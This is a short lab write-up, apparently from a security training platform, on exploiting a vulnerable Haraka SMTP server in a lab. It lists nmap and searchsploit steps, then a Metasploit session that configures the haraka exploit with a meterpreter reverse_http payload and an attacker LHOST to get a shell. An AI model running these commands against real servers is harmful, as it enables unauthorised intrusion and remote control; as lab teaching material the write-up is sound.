Vulnerable SMTP Server
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.
Objective: Your task is to fingerprint the application using command line tools available in Kali and then exploit the application using the appropriate Metasploit module. Get a shell on the target!
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
searchsploit Haraka
msfconsole
use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http
set rhost demo.ine.local
set LHOST 192.252.132.2
run
Last updated